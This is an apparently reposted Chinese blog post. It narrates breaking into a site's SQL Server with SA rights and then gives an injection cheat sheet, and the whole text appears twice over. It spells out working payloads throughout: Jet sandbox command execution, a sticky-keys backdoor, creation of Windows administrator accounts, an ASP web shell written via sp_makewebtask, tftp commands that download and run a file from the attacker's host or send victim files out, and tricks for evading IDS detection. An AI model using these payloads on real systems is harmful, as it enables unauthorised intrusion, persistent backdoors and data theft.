一次SA权限入侵和小议SA提权
程序员文章站
2022-07-03 09:45:34
来自草哲的blog
尝试在NB里面恢复CMDSHELL、OACREAT都没有成功,所以开启SQLSERVERAGENT
;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT&... 08-10-08...
来自草哲的blog
尝试在nb里面恢复cmdshell、oacreat都没有成功,所以开启sqlserveragent
;exec master.dbo.xp_servicecontrol 'start','sqlserveragent';--
还是没有成功,无奈之中希望寄托于沙盒模式,执行如下语句开启沙盒模式
;execmaster..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',0;--
回显成功,进一步调用oledb执行系统命令
and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd /c echo 1 >c:\1.txt")'))--
回显500,明显出错了,沙盒模式也暂且放下 既然可以写注册表,那一定可以读注册表,那先读读终端端口看看。
是默认的3389但是我无法连接,或许是没开终端服务,或许是防火墙屏蔽,不得而知,一定想知道我为什么要连接终端吧,下面看这段语句。
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
大家一定记得最近很流行的shift后吧,以上两段语句就是利用fso组件的读写权限替换粘拈键为桌面的启动程序explorer,如果替换成功那么执行5次shift后就可以直接执行explorer.exe开启桌面,但是连不上远程这个方法也就不能用了。当然以上的命令需要oacreat的支持,我也就是抱着侥幸的心理试试看。假设oacreat没有删,我们还可以利用以下语句执行系统命令。
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null, 'c:\winnt\system32\cmd.exe /c net user jxsaqjh 1234 /add';--
;declare @shell int exec sp_oacreate 'shell.application',@shell output exec sp_oamethod @shell,'run',null, 'c:\winnt\system32\cmd.exe /c net user jxsaqjh 1234/add';--
以上两个语句也是利用oacreat调用wscript.shell和shell.application组件执行系统命令,但是在这里我们是用不了的,因为不仅oacreat不在,就连那两个危险组件管理也写了个批处理卸了。
万般无奈下尝试log备分拿只shell,可是备分的页面却是404,很显然这个sa没有备分的权限,还能怎么做?看下面:
;exec sp_makewebtask 'd:\zjkdj\zjkdj\zjkds\bake.asp,' select ''<%execute(request("a"))%>'' ';--
利用sp_makewebtask这个存储过程写个马进去,很幸运这个过程是能用的,成功得到shell,本来想传xplog70.dll上去恢复xp_cmdshell存储过程,但是执行恢复的时候发现这个过程是在的,然后在海洋里执行cmdshell执行系统命令,但是出现了这一句,
xpsql.cpp: 错误 2 来自 createprocess(第 737 行
我晕啊,难道是cmd.exe删了?在nb里面列目录查看system32下的文件,果然没有cmd.exe,这下终于真象大白了,原来不能执行系统命令的原因是每个存储过程都是调用系统的cmd.exe,既然没有cmd.exe那还怎么执行系统命令?管理还是下了辛苦的哦。
整理下思路后我又想到了沙盒模式,因为啥盒模式调用的cmd不一定是系统自带的,我们可以自己传一个上去的,想到这里在web目录下传了个cmd.exe然后在海洋里执行如下语句
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("d:\zjkdj\zjkdj\zjkds\cmd.exe /c net start>d:\zjkdj\zjkdj\zjkds\1.txt")')--
立刻到站点目录下找1.txt,但是没有发现,看来只能调用系统自带的程序了,无聊的在system32下乱逛,突然发现了command.com这个程序,哈哈,总算看到希望了!这是什么?我来告诉你吧,它也是系统自带的执行系统命令的程序,和cmd.exe的功能几乎没有区别,但是大小却比cmd.exe小几十倍,既然不让调用外部程序那我就调用内部程序,马上就在海洋里修改好如下语句执行。
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net start>d:\zjkdj\zjkdj\zjkds\1.txt")')--
调用command.com执行系统命令,执行完成后在站点目录下总算找到了1.txt
哈哈,总算看到希望了,打开1.txt看看服务器开了什么服务,但是我却看到一片空白,这是什么原因?难道?还是确定一下比较好,立刻转到system32下查看文件,令我吃惊的是居然没有看到net.exe,怪不得一片空白呢,系统根本没有net.exe这个程序,自然是什么也看不到,郁闷,管理员不是一般的变态啊!
不过没有关系,windows系统中还有一个叫net1.exe的程序功能是和net.exe一样的哦,我们来调用它执行系统命令,语句如下
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net1 start>d:\zjkdj\zjkdj\zjkds\1.txt")')--
执行完毕后再看1.txt
哈哈,成功了,入侵到了这里也就没有什么继续的必要了,因为我们已经有了系统权限,想做什么都随自己愿意了,收拾收拾在管理员的桌面上写个提醒.txt告诉他漏洞所在,让他尽快修补吧!
最后总结一下,在先前以为是系统的存储过程删掉了,但是后来随着入侵的深入才发现过程并没有删,只是每个存储过程都必须调用cmd.exe所以不能执行系统命令也是肯定的了,所以大家在入侵的时候一定要细心的分析整个过程,从中找出对自己有用的东西。
第二
一:命令简介
[获取全部数据库名]
select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
select top 1 name from 数据库名.dbo.sysobjects where xtype=’u’ and status>0 and name not in(’table’)
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
select top 1 数据库名.dbo.col_name(object_id(’要查询的数据表名’),字段列如:1) [ where 条件]
通过sqlserver注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是sysadmin组]
news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell ’net user test test /add’;-- //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell ’net localgroup administrators test /add’;-- //将系统用户test提升为管理员
这样,你在他的数据库和系统内都留下了test管理员账号了
下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为tftp服务器,将69端口打开]
id=2; exec master.dbo.xp_cmdshell ’tftp –i 你的ip get file.exe’;--
然后运行这个文件:
id=2; exec master.dbo.xp_cmdshell ’file.exe’;--
下载服务器的文件file2.doc到本地tftp服务器[文件必须存在]:
id=2; exec master.dbo.xp_cmdshell ’tftp –i 你的ip put file2.doc’;--
绕过ids的检测[使用变量]
declare @a sysname set @a=’xp_’ ’cmdshell’ exec @a ’dir c:\’
declare @a sysname set @a=’xp’ ’_cm’ ’dshell’ exec @a ’dir c:\’
新加的:
建一个表。只有一个字段,类型为image,将asp内容写入。导出数据库为文件
backup database dbname to disk=’d:\web\db.asp’;
报错得到系统操作系统和数据库系统版本号
id=2 and 1<>(select @@version);
尝试在nb里面恢复cmdshell、oacreat都没有成功,所以开启sqlserveragent
;exec master.dbo.xp_servicecontrol 'start','sqlserveragent';--
还是没有成功,无奈之中希望寄托于沙盒模式,执行如下语句开启沙盒模式
;execmaster..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',0;--
回显成功,进一步调用oledb执行系统命令
and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd /c echo 1 >c:\1.txt")'))--
回显500,明显出错了,沙盒模式也暂且放下 既然可以写注册表,那一定可以读注册表,那先读读终端端口看看。
是默认的3389但是我无法连接,或许是没开终端服务,或许是防火墙屏蔽,不得而知,一定想知道我为什么要连接终端吧,下面看这段语句。
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
大家一定记得最近很流行的shift后吧,以上两段语句就是利用fso组件的读写权限替换粘拈键为桌面的启动程序explorer,如果替换成功那么执行5次shift后就可以直接执行explorer.exe开启桌面,但是连不上远程这个方法也就不能用了。当然以上的命令需要oacreat的支持,我也就是抱着侥幸的心理试试看。假设oacreat没有删,我们还可以利用以下语句执行系统命令。
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null, 'c:\winnt\system32\cmd.exe /c net user jxsaqjh 1234 /add';--
;declare @shell int exec sp_oacreate 'shell.application',@shell output exec sp_oamethod @shell,'run',null, 'c:\winnt\system32\cmd.exe /c net user jxsaqjh 1234/add';--
以上两个语句也是利用oacreat调用wscript.shell和shell.application组件执行系统命令,但是在这里我们是用不了的,因为不仅oacreat不在,就连那两个危险组件管理也写了个批处理卸了。
万般无奈下尝试log备分拿只shell,可是备分的页面却是404,很显然这个sa没有备分的权限,还能怎么做?看下面:
;exec sp_makewebtask 'd:\zjkdj\zjkdj\zjkds\bake.asp,' select ''<%execute(request("a"))%>'' ';--
利用sp_makewebtask这个存储过程写个马进去,很幸运这个过程是能用的,成功得到shell,本来想传xplog70.dll上去恢复xp_cmdshell存储过程,但是执行恢复的时候发现这个过程是在的,然后在海洋里执行cmdshell执行系统命令,但是出现了这一句,
xpsql.cpp: 错误 2 来自 createprocess(第 737 行
我晕啊,难道是cmd.exe删了?在nb里面列目录查看system32下的文件,果然没有cmd.exe,这下终于真象大白了,原来不能执行系统命令的原因是每个存储过程都是调用系统的cmd.exe,既然没有cmd.exe那还怎么执行系统命令?管理还是下了辛苦的哦。
整理下思路后我又想到了沙盒模式,因为啥盒模式调用的cmd不一定是系统自带的,我们可以自己传一个上去的,想到这里在web目录下传了个cmd.exe然后在海洋里执行如下语句
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("d:\zjkdj\zjkdj\zjkds\cmd.exe /c net start>d:\zjkdj\zjkdj\zjkds\1.txt")')--
立刻到站点目录下找1.txt,但是没有发现,看来只能调用系统自带的程序了,无聊的在system32下乱逛,突然发现了command.com这个程序,哈哈,总算看到希望了!这是什么?我来告诉你吧,它也是系统自带的执行系统命令的程序,和cmd.exe的功能几乎没有区别,但是大小却比cmd.exe小几十倍,既然不让调用外部程序那我就调用内部程序,马上就在海洋里修改好如下语句执行。
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net start>d:\zjkdj\zjkdj\zjkds\1.txt")')--
调用command.com执行系统命令,执行完成后在站点目录下总算找到了1.txt
哈哈,总算看到希望了,打开1.txt看看服务器开了什么服务,但是我却看到一片空白,这是什么原因?难道?还是确定一下比较好,立刻转到system32下查看文件,令我吃惊的是居然没有看到net.exe,怪不得一片空白呢,系统根本没有net.exe这个程序,自然是什么也看不到,郁闷,管理员不是一般的变态啊!
不过没有关系,windows系统中还有一个叫net1.exe的程序功能是和net.exe一样的哦,我们来调用它执行系统命令,语句如下
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net1 start>d:\zjkdj\zjkdj\zjkds\1.txt")')--
执行完毕后再看1.txt
哈哈,成功了,入侵到了这里也就没有什么继续的必要了,因为我们已经有了系统权限,想做什么都随自己愿意了,收拾收拾在管理员的桌面上写个提醒.txt告诉他漏洞所在,让他尽快修补吧!
最后总结一下,在先前以为是系统的存储过程删掉了,但是后来随着入侵的深入才发现过程并没有删,只是每个存储过程都必须调用cmd.exe所以不能执行系统命令也是肯定的了,所以大家在入侵的时候一定要细心的分析整个过程,从中找出对自己有用的东西。
第二
一:命令简介
[获取全部数据库名]
select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
select top 1 name from 数据库名.dbo.sysobjects where xtype=’u’ and status>0 and name not in(’table’)
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
select top 1 数据库名.dbo.col_name(object_id(’要查询的数据表名’),字段列如:1) [ where 条件]
通过sqlserver注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是sysadmin组]
news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell ’net user test test /add’;-- //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell ’net localgroup administrators test /add’;-- //将系统用户test提升为管理员
这样,你在他的数据库和系统内都留下了test管理员账号了
下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为tftp服务器,将69端口打开]
id=2; exec master.dbo.xp_cmdshell ’tftp –i 你的ip get file.exe’;--
然后运行这个文件:
id=2; exec master.dbo.xp_cmdshell ’file.exe’;--
下载服务器的文件file2.doc到本地tftp服务器[文件必须存在]:
id=2; exec master.dbo.xp_cmdshell ’tftp –i 你的ip put file2.doc’;--
绕过ids的检测[使用变量]
declare @a sysname set @a=’xp_’ ’cmdshell’ exec @a ’dir c:\’
declare @a sysname set @a=’xp’ ’_cm’ ’dshell’ exec @a ’dir c:\’
新加的:
建一个表。只有一个字段,类型为image,将asp内容写入。导出数据库为文件
backup database dbname to disk=’d:\web\db.asp’;
报错得到系统操作系统和数据库系统版本号
id=2 and 1<>(select @@version);
上一篇: 【5G之道】第一章:介绍